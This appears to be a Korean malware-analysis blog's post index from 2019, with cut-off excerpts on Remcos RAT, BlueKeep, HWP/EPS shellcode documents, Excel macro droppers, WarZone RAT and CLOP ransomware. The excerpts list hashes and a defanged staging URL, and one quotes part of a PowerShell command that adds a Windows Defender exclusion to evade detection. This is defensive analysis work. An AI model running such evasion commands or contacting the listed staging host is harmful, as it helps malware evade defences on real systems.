190523_ISO악성코드(PDF.EXE)-Remcos RAT(2.4.5 pro) 이번 샘플은 Remcos RAT 툴을 이용한 악성코드이다. Remcos RAT는 사용자들이 전 세계 어디서든 시스템을 제어할 수 있는 커스터마이징이 가능한 정식 원격 접속 툴이며, 여기에는 다운로드, 명령어 실행, 키로거, 스크린로거, 웹캠 및 마이크 레코더 등의 기능이 포함되어있다. 해커들 사이에서도 흔히 사용되는 도구: 렘코스(Remcos), 다크코멧(DarkComet), 쿼사 RAT(Quasar RAT), 퓨피 RAT(Pupy RAT), 나노코어(NanoCore), 넷위어드(NetWeird), 미미캣츠(Mimikatz), 스니프패스(SniffPass), 라자냐(LaZagne), Gpp패스워드(Gpppassword) 등 [드로퍼_PDF.EXE] 드로퍼는 구매 관련 악성메일로.......

190607_Bluekeep_(CVE-2019-0708) [내부링크]

190607_Bluekeep_(CVE-2019-0708) 마이크로소프트가 5월에 원격 코드 실행 취약성(CVE-2019-0708)에 대한 경고를 발표했다. (영향받는 OS: 윈도우 7, 윈도우 XP, 윈도우 2003, 윈도우 서버 2008 R2 및 윈도우 서버 2008) 이후 취약점은 ‘블루키프(BlueKeep)’라고 불리게 되었으며, 해당 취약점 관련하여 깃허브에 올라와 있는 상황이다. (취약점을 이용하여 원격의 PC를 shutdown하는 시연 영상도 확인할수있다.) 취약점을 통해 웜 악성코드가 퍼질 수 있으므로, 주의가 필요하다. <원격의 PC를 shutdown하는 시연 영상> <BlueKeep>

190619_EPS 한글 악성코드(Data 패킷에 수집정보 전송)_tjdrhd88 [내부링크]

190619_EPS 한글 악성코드(Data 패킷에 수집정보 전송) 해당 악성코드는 EPS 관련 취약점을 이용한 악성코드이다. 기존에 EPS 관련 악성코드에 대해 다룬 포스팅이 있으므로, 자세한 설명은 생략하고 분석한 내용을 정리했다. # 한컴오피스에서는 업데이트 패치로 취약점 관련 파일인 고스트스크립트(GS) 관련 모듈을 삭제하여, *.ai, *.ps, *.eps 등의 이미지 파일을 더 이상 사용할 수 없도록 조치하였다. https://www.hancom.com/board/noticeView.do?board_seq=3&artcl_seq=6606&pageInfo.page=&search_text= 1. 쉘코드가 삽입된 EPS를 포함한 한글 문서 해당 한글문서는 쉘코드가 삽입된 EPS 개체를 포함하고 있으며, 한글문서.......

190702_한글 PS를 악용한 악성코드(클라우드 서비스) [내부링크]

요번샘플은 기존에 분석한적이 있던 악성코드의 또 다른 버전이다. 같은 공격자가 만든 악성코드로 추측된다. 해당 샘플은 아래와같다. https://blog.naver.com/hanguk529/221411684947 http://hanguk529.blog.me/221425520172 요번 샘플은 경유지URL에서 받아지는 추가 악성파일은 받지 못했다. 한글 HWP파일을 분석하였으며, 경유지URL에 연결되지 않아 추가 분석은 불가능 하였다. ============================================================================================== 1. [.HWP] 파일 한글 문서를 실행한 사용자에게 정상 한글 문서처럼 본문을 로드한다. 1. [.HWP] 파일 정상 한글문서 처럼 보이지만, 쉘코드가 삽입된 PS개체.......

190715_TXT파일로 위장한 wsf파일(FTP로 정보전송) [내부링크]

190715_TXT파일로 위장한 wsf파일(FTP로 정보전송) 해당 파일은 TXT파일로 위장한 Windows 스크립트 파일이다. 해당 스크립트가 실행되면 경유지 URL에서 추가 악성파일(.dll)을 다운로드하여 실행한다. DLL파일은 사용자 정보들을 수집하여 FTP를 이용해 파일을 업로드한다. 해당 파일은 아래와 같이 확장자가 wsf인 Windows 스크립트 파일이다. PC 설정이 확장자가 안보이도록 되어있다면, .TXT로 보이므로 텍스트파일로 생각하고 실행하는걸 노리고 유포되었다. 해당 스크립트는 아래와 같이 특정 경유지 URL에서 추가 악성파일을 다운 받도록 되어있다. 경유지에서 받아지는 압축파일(.rar)은 암호가 걸려있으며, 압축파일의 암호 또한 스크.......

190722_워크시트_엑셀 매크로(PC에저장된 각종 로그인정보 전송) [내부링크]

190722_워크시트_엑셀 매크로(PC에저장된 각종 로그인정보 전송) 해당 악성코드는 사용자 PC에 저장된 각종 로그인 데이터들을 수집하여 전송하는 기능을 가지고있다. 정보수집용 악성코드로 확인된다. 해당 메일은 메일본문에 클릭을 유도하는 링크를 넣어 유포되었다. 경유지URL에서 다운로드 되는 파일은 워드문서(.doc)이다. 경유지URL: hxxp:// ### /css/log/wp/plan/plans/enble_voice_note.doc 메일에 존재하는 링크를 통해 받아지는 파일은 워드문서(.doc)이다. 해당 워드 문서에는 악의적인 매크로가 포함된 워크시트가 존재하여, 문서 실행 시 엑셀이 동작하며 매크로가 동작한다. . 워드 문서(.doc)에 존재하는 워크시크가 실행된 모.......

190823_EXE파괴 악성코드(EXE암호화, 레지스트리수정) [내부링크]

190823_EXE파괴 악성코드(EXE암호화, 레지스트리수정) --------------------------- 체크섬 정보 --------------------------- 이름: 패키지 정보_2019-08-23-DHL_메일-소포 부서.exe 크기: 432128 바이트 (0 MB) CRC32: AC863285 CRC64: 7371EEA4B9DE6A1A SHA256: D14BC0CFE5345E025DC625022B09F62DC9C6F07AB076E179A876868C1E82584C SHA1: 1EB538DE67993BB7FFED7EA8D260043B01981371 BLAKE2sp: 19585959461964EEACA106FD2C7E799B70952172DB150EE636740510E419FB51 --------------------------- 확인 --------------------------- 해당 악성코드는 특정경로의 응용프로그램(.exe)파일들을 암호화하고, 실행 관련 레지스트리 값을 수정하여 응용.......

190823_EPS 한글 악성코드(Data 패킷에 수집정보 전송)_tjdrhd16 [내부링크]

190823_EPS 한글 악성코드(Data 패킷에 수집정보 전송)_tjdrhd16 해당 악성코드는 기존 분석했던 같은 공격그룹의 소행으로 추측된다. 기존 악성코드 동작방식과 동일하며, 190619 포스팅했던 샘플에선 사용자식별용도로 만드는 문자열을 [컴퓨터이름]_tjdrhd88로 만들었지만, 요번에는 [컴퓨터이름]_tjdrhd16으로 변경했다. tjdrhd 문자열은 한글타자식으로 바꿔보면 성공이라는 문자열이 된다. 해당 문자열을 포함한 파라미터값을 경유지 URL로 전송한다. 또한 HTTP 데이터 매개변수는 WebKitFormBoundarywhpFxMBe19cSjFnG 으로 전과 동일한것이 확인되었다. 기존 포스팅했던 글과 EPS 분석했던 방식과 동일하기 때문에 분석할때는 최소한의 작.......

190828_WarZone RAT 악성코드 [내부링크]

해당 악성코드는 WarZone RAT 라는 원격관리도구기능의 악성코드이다. =========================================================================== =========================================================================== 압축파일(payment reciept.zip)에는 악성파일이 존재하며, 압축을 해제하여 파일을 실행할 경우 악성코드에 감염된다. 악성파일: Payment Reciept.exe CopyFile함수를 사용하여 자신을 특정 경로에 복사한다. 복사경로: C:\ProgramData\images.exe 파워쉘을 이용한 특정 명령어 사용으로 Windows Defender에 예외 폴더를 설정하여 탐지 우회를 시도한다. 파워쉘 명령어: powershell Add-MpPreference –Exclusio.......

190906_word searches.exe [내부링크]

특정 시그니처를 가진 파일을 검색하는 프로그램(파일 바이너리 데이터값 검색), 하위경로 모두 =============================================================================================================이름: 190906_word searches.exe 크기: 6075724 바이트 (5933 KiB) CRC32: 92BF977E CRC64: 7B803FF6F16B9348 SHA256: CCE60DB1967295802D49C5AAD1B8D7A603442CE95C9D6A7FBCE18C6558E717DD SHA1: 6434C0C7061783397E82EF43C3B267898A41BE08 BLAKE2sp: 3499A72ECC4F8B8F9B3ACAB7077592401A99F4D7CAB587AA998B1F0DDB1517F6

예정 - 필요프로그램 [내부링크]

특정 경로에 특정 시그니처를 가진 파일을 검색하는 프로그램 필요 특정 경로 하위경로 모두 특정 시그니처를 가진 파일찾기 바이너리 검색

190311_근황 [내부링크]

요즘은 바쁜하루하루를 보내고있다 조만간 분석 포스팅을 진행할 예정

190327_엑셀숨김시트(RAT) 악성코드 [내부링크]

190327_엑셀숨김시트(RAT) 악성코드 해당 악성코드는 전에 포스팅했던 적이있는 인보이스 RAT 악성코드와 동일한 해커가 제작 배포중인 샘플이다. 동작방식이 똑같으며, 경유지 IP만 변경되어 배포되었다. 1. 악성 MS Office 엑셀 1.1 매크로를 기능을 이용한 악성행위 해당 악성파일(구매오더4500286249.xls)은 MS Office 엑셀의 매크로 기능을 이용했다. 그리고 악의적인 코드를 넣은 시트를 숨겨서 사용자가 인지하지 못하도록 했다. 1.2 추가 악성파일 다운로드 숨겨진 시트에는 정상 프로세스인 MS인스톨러(msiexec.exe)를 실행시킨 후 악의적인 코드를 이용하여 추가 악성파일를 다운로드 및 실행하는 코드가 존재한다. 경유지URL: hxxp://.......

190401_한글EPS_파워쉘_키로거(PowerShell_Keylogger) [내부링크]

190401_한글EPS_파워쉘_키로거(PowerShell_Keylogger) 오늘 확인된 악성 코드는 한글 EPS 취약점을 이용하여 경유지 URL에 접속하여 파워쉘 스크립트를 내려받아 키로깅을 하는 악성코드이다. 해당 경유지는 서비스 중인 국내사이트로 확인되어 모자이크 후 포스팅 예정이다. 지금은 포스팅 할 시간이 안되서, 자세한 포스팅은 04/02 할 예정이다. 아래는 키로깅 동작을 하는 파워쉘 스크립트의 일부분이다. 해당 악성 코드는 한글 EPS 취약점을 이용하여 경유지 URL에 접속하여 파워쉘 스크립트를 내려받아 키로깅을 하는 악성코드이다. 아래와 같은 한글문서에 악의적인 쉘코드를 삽입한 EPS 개체를 삽입하였다. 한글문.......

190411_클롭(CLOP)랜섬웨어_CLOP#666 [내부링크]

190411_클롭(CLOP)랜섬웨어_CLOP#666 최근 기업을 대상으로 유포되었던 클롭(CLOP)랜섬웨어이다. 해당랜섬웨어는 기존에 포스팅했던 엑셀 숨김시트를 이용한 악성코드(RAT)와 연관이 있는것으로 추측된다고 한다. 자세한 내용은 아래의 안랩 보안 이슈에서 확인 가능하다. 클롭(CLOP)랜섬웨어는 실행중인 프로세스 목록을 불러온다. 프로세스 목록을 불러온 후, 찾는 프로세스가 있을 경우 종료시킨다. 클롭(CLOP)랜섬웨어의 뮤텍스는 CLOP#666 이다. 클롭(CLOP)랜섬웨어는 암호화를 예외할 디렉토리와 파일 목록을 가지고 있다.아래와 같이 특정 경로와 파일명 및 확장자를 예외로 한다. 예외되는 목록에 해당되지 않을 경우 아래와 같이 암호화.......

190419_SysCertUpdate.dll 악성코드(daum mail이용) [내부링크]

190419_SysCertUpdate.dll 악성코드(daum mail이용) 금일 악성코드는 기존에 포스팅했던 APT악성코드와 daum mail을 통해 데이터를 업로드한다는 부분이 유사하다. 분석 시간이 넉넉하지 못해서 자세하게 분석하지는 못했다. 여유있을때 조금더 살펴볼 예정이다. [mail2.daum.net를 이용해 데이터를 업로드, 다운로드 했던 악성코드 포스팅] 해당 악성코드는 시작프로그램에 등록되어 사용자가 PC를 재부팅 할 때마다 작동하도록 되어있었다. syscert란 이름으로 시작프로그램에 등록된 악성코드 SysCertUpdate.dll은 rundll32.exe를 이용해 실행되었다. SysCertUpdate.dll 은 Process Hollowing 기법을 이용하여 정상프로세스에 악의적인 PE데이.......

190423_PDF.EXE_tytyteyhyd [내부링크]

190423_PDF.EXE_tytyteyhyd 해당 악성코드는 사용자가 첨부파일을 실행하도록 유도하는 메일을 통해 유포되었다. 첨부되어있는 악성파일을 실행 할 경우, 추가 경유지 URL로 연결되지만, 분석당시 연결되지 않아 추가 분석은 불가능했다. 악성메일은 '연체된 보류 인보이스' 라는 제목으로 유포되었다. 해당 악성파일은 압축파일 형태(.ace)로 되어있으며, 압축파일에는 PDF로 위장한 응용프로그램인 악성파일(,pdf.exe)가 존재한다. 해당 악성파일(,pdf.exe)의 디지털 서명은 Loops quantum 으로 되어있다. 악성파일(,pdf.exe)을 실행할 경우 자신을 %Temp%경로에 파일을 복사한다. 그리고 VBS스크립트를 생성하며, 이후 자신을 삭제한다. VBS스.......

190502_엑셀숨김시트(wsus.exe) [내부링크]

190502_엑셀숨김시트(wsus.exe) 최근 자주 확인되는 190502_엑셀숨김시트(wsus.exe) 악성코드이다. 간단하게 분석을 진행하였다. 해당 악성파일(요청자료2.xls)은 MS Office 엑셀의 매크로 기능을 이용했으며, 악의적인 코드를 넣은 시트를 숨겨서 사용자가 인지하지 못하도록 했다. 엑셀의 악의적인 매크로는 정상 프로세스인 MS인스톨러(msiexec.exe)를 실행시킨 후 경유지 URL로 접속을 시도하여 추가 악성파일(cykom1)을 다운로드 및 실행한다. 경유지URL: hxxp://slemend.com/cykom1 다운로드 된 악성파일(cykom1)은 추가 경유지로 연결되어 추가 악성파일(1.tmp)을 특정경로에 저장 및 실행한다. 추가 악성파일(1.tmp)은 “wsus.exe“로 다.......

190509_이미지무단도용 랜섬웨어(파란감염화면) [내부링크]

190509_이미지무단도용 랜섬웨어(파란감염화면) 해당 악성코드는 랜섬웨어이다. 감염되어 암호화가 완료된 후, 변경된 바탕화면이 기존에 보던 랜섬웨어와 다르다. 경유지 URL이 1000개가 넘게 존재하며, 감염된 PC의 정보를 수집하여 각 URL에 전송한다. 전송이 완료된 후 자신을 종료한다. 기존 랜섬웨어들과 같이 이메일을 통해 유포되었다. 첨부파일은 rar로 압축되어있으며, 압축 해제시 hwp파일을 사칭한 응용프로그램(.exe)가 존재한다. 해당파일을 열어볼 경우 해당 랜섬웨어에 감염되어 파일들이 암호화된다. 암호화 루틴에 의해 디렉토리를 탐색하여 파일들을 랜덤한 확장자로 변경하며, 파일 암호화를 진행한다. 암호화가 완료된 후, .......